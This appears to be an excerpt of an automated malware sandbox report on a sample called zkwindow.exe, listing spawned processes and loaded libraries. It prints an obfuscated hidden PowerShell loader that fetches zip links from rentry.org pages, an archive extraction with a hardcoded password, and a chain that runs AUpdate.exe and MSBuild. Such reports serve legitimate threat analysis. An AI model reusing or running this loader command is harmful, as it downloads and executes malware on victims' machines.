                            Source: unknownProcess created: C:\Users\user\Desktop\zkwindow.exe "C:\Users\user\Desktop\zkwindow.exe"
                            Source: C:\Users\user\Desktop\zkwindow.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w h -Nop -NonI -e"n"c WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgAgAC0AYgBvAHIAIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMwANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAB7AA0ACgAgACAAIAAgAHAAYQByAGEAbQAoAFsAcwB0AHIAaQBuAGcAXQAkAHAAYQBnAGUAVQByAGwAKQANAAoAIAAgACAAIAAkAHIAZQBzAHAAbwBuAHMAZQAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABwAGEAZwBlAFUAcgBsACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwANAAoAIAAgACAAIAAkAGwAaQBuAGsAIAA9ACAAJAByAGUAcwBwAG8AbgBzAGUALgBMAGkAbgBrAHMAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4AaAByAGUAZgAgAC0AbQBhAHQAYwBoACAAIgBcAC4AegBpAHAAIgAgAH0AIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARgBpAHIAcwB0ACAAMQANAAoAIAAgACAAIABpAGYAIAAoACQAbABpAG4AawApACAAewANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABsAGkAbgBrAC4AaAByAGUAZgAgAC0AbQBhAHQAYwBoACAAIgBeAGgAdAB0AHAAcwA/ADoALwAvACIAKQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABsAGkAbgBrAC4AaAByAGUAZgANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFUAcgBpACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBVAHIAaQAgACQAcgBlAHMAcABvAG4AcwBlAC4AQgBhAHMAZQBSAGUAcwBwAG8AbgBzAGUALgBSAGUAcwBwAG8AbgBzAGUAVQByAGkAKQAsACAAJABsAGkAbgBrAC4AaAByAGUAZgApACkALgBBAGIAcwBvAGwAdQB0AGUAVQByAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQAgAHsADQAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAbgB1AGwAbAANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgANAAoAJABwAGEAZwBlADEAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvADAAeABmADYARQBBADcAYgBGADUAZAAwADgAOQBGADQAMwA5AEUAYwA2AGUANwBhADEAMwAxADMAOAA4ADUANwA5AGQAMABDAGEAYQA4ADYAMgBkADQARQBFADAAIgANAAoAJABwAGEAZwBlADIAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvADAAeABmADYARQBBADcAYgBGADUAZAAwADgAOQBGADQAMwA5AEUAYwA2AGUANwAwADEAMAAxADAAMQBhADgAOAA1ADcAOQBkADAAQwBhAGEAOAA2ADIAZAA0AEUARQAwACIADQAKACQAcwBlAHYAZQBuAFoAaQBwAFUAcgBsACAAPQAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAAkAHAAYQBnAGUAMQANAAoAJABtAGEAbgBhAGcAZQByAFoAaQBwAFUAcgBsACAAPQAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAAkAHAAYQBnAGUAMgANAAoAaQBmACAAKAAtAG4AbwB0ACAAJABzAGUAdgBlAG4AWgBpAHAAVQByAGwAKQAgAHsAIAByAGUAdAB1AHIAbgAgAH0ADQAKAGkAZgAgACgALQBuAG8AdAAgACQAbQBhAG4AYQBnAGUAcgBaAGkAcABVAHIAbAApACAAewAgAHIAZQB0AHUAcgBuACAAfQANAAoADQAKACQAcwBlAHYAZQBuAFoAaQBwAFoAaQBwAFAAYQB0AGgAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACIANwB6ADEAOQAwADAALQB4ADYANAAuAHoAaQBwACIADQAKACQAcwBlAHYAZQBuAFoAaQBwAEUAeAB0AHIAYQBjAHQAUABhAHQAaAAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAEUATQBQACAAIgA3AHoAaQBwACIADQAKAEkA
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\7zip\7za.exe "C:\Users\user\AppData\Local\Temp\7zip\7za.exe" x "C:\Users\user\AppData\Local\Temp\fe387de893ce4f2ca49f16029d364dc1" -o"C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47" -p5478fhjdDSHJHDSJFHJSD#@$@$%^#$%WDF! -y
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe "C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe"
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe "C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe"
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            Source: C:\Users\user\Desktop\zkwindow.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w h -Nop -NonI -e"n"c WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgAgAC0AYgBvAHIAIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMwANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAB7AA0ACgAgACAAIAAgAHAAYQByAGEAbQAoAFsAcwB0AHIAaQBuAGcAXQAkAHAAYQBnAGUAVQByAGwAKQANAAoAIAAgACAAIAAkAHIAZQBzAHAAbwBuAHMAZQAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABwAGEAZwBlAFUAcgBsACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwANAAoAIAAgACAAIAAkAGwAaQBuAGsAIAA9ACAAJAByAGUAcwBwAG8AbgBzAGUALgBMAGkAbgBrAHMAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4AaAByAGUAZgAgAC0AbQBhAHQAYwBoACAAIgBcAC4AegBpAHAAIgAgAH0AIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARgBpAHIAcwB0ACAAMQANAAoAIAAgACAAIABpAGYAIAAoACQAbABpAG4AawApACAAewANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABsAGkAbgBrAC4AaAByAGUAZgAgAC0AbQBhAHQAYwBoACAAIgBeAGgAdAB0AHAAcwA/ADoALwAvACIAKQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABsAGkAbgBrAC4AaAByAGUAZgANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFUAcgBpACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBVAHIAaQAgACQAcgBlAHMAcABvAG4AcwBlAC4AQgBhAHMAZQBSAGUAcwBwAG8AbgBzAGUALgBSAGUAcwBwAG8AbgBzAGUAVQByAGkAKQAsACAAJABsAGkAbgBrAC4AaAByAGUAZgApACkALgBBAGIAcwBvAGwAdQB0AGUAVQByAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAZQBsAHMAZQAgAHsADQAKACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAbgB1AGwAbAANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgANAAoAJABwAGEAZwBlADEAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvADAAeABmADYARQBBADcAYgBGADUAZAAwADgAOQBGADQAMwA5AEUAYwA2AGUANwBhADEAMwAxADMAOAA4ADUANwA5AGQAMABDAGEAYQA4ADYAMgBkADQARQBFADAAIgANAAoAJABwAGEAZwBlADIAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvADAAeABmADYARQBBADcAYgBGADUAZAAwADgAOQBGADQAMwA5AEUAYwA2AGUANwAwADEAMAAxADAAMQBhADgAOAA1ADcAOQBkADAAQwBhAGEAOAA2ADIAZAA0AEUARQAwACIADQAKACQAcwBlAHYAZQBuAFoAaQBwAFUAcgBsACAAPQAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAAkAHAAYQBnAGUAMQANAAoAJABtAGEAbgBhAGcAZQByAFoAaQBwAFUAcgBsACAAPQAgAEcAZQB0AC0AWgBpAHAATABpAG4AawBGAHIAbwBtAFAAYQBnAGUAIAAkAHAAYQBnAGUAMgANAAoAaQBmACAAKAAtAG4AbwB0ACAAJABzAGUAdgBlAG4AWgBpAHAAVQByAGwAKQAgAHsAIAByAGUAdAB1AHIAbgAgAH0ADQAKAGkAZgAgACgALQBuAG8AdAAgACQAbQBhAG4AYQBnAGUAcgBaAGkAcABVAHIAbAApACAAewAgAHIAZQB0AHUAcgBuACAAfQANAAoADQAKACQAcwBlAHYAZQBuAFoAaQBwAFoAaQBwAFAAYQB0AGgAIAA9ACAASgBvAGkAbgAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACIANwB6ADEAOQAwADAALQB4ADYANAAuAHoAaQBwACIADQAKACQAcwBlAHYAZQBuAFoAaQBwAEUAeAB0AHIAYQBjAHQAUABhAHQAaAAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAEUATQBQACAAIgA3AHoAaQBwACIADQAKAEkAJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\7zip\7za.exe "C:\Users\user\AppData\Local\Temp\7zip\7za.exe" x "C:\Users\user\AppData\Local\Temp\fe387de893ce4f2ca49f16029d364dc1" -o"C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47" -p5478fhjdDSHJHDSJFHJSD#@$@$%^#$%WDF! -y Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe "C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                            Source: C:\Users\user\Desktop\zkwindow.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: netapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: isscint.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: iscmplr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: msimg32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: dbghelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: pla.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: pdh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: tdh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: shdocvw.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: version.dllJump to behavior
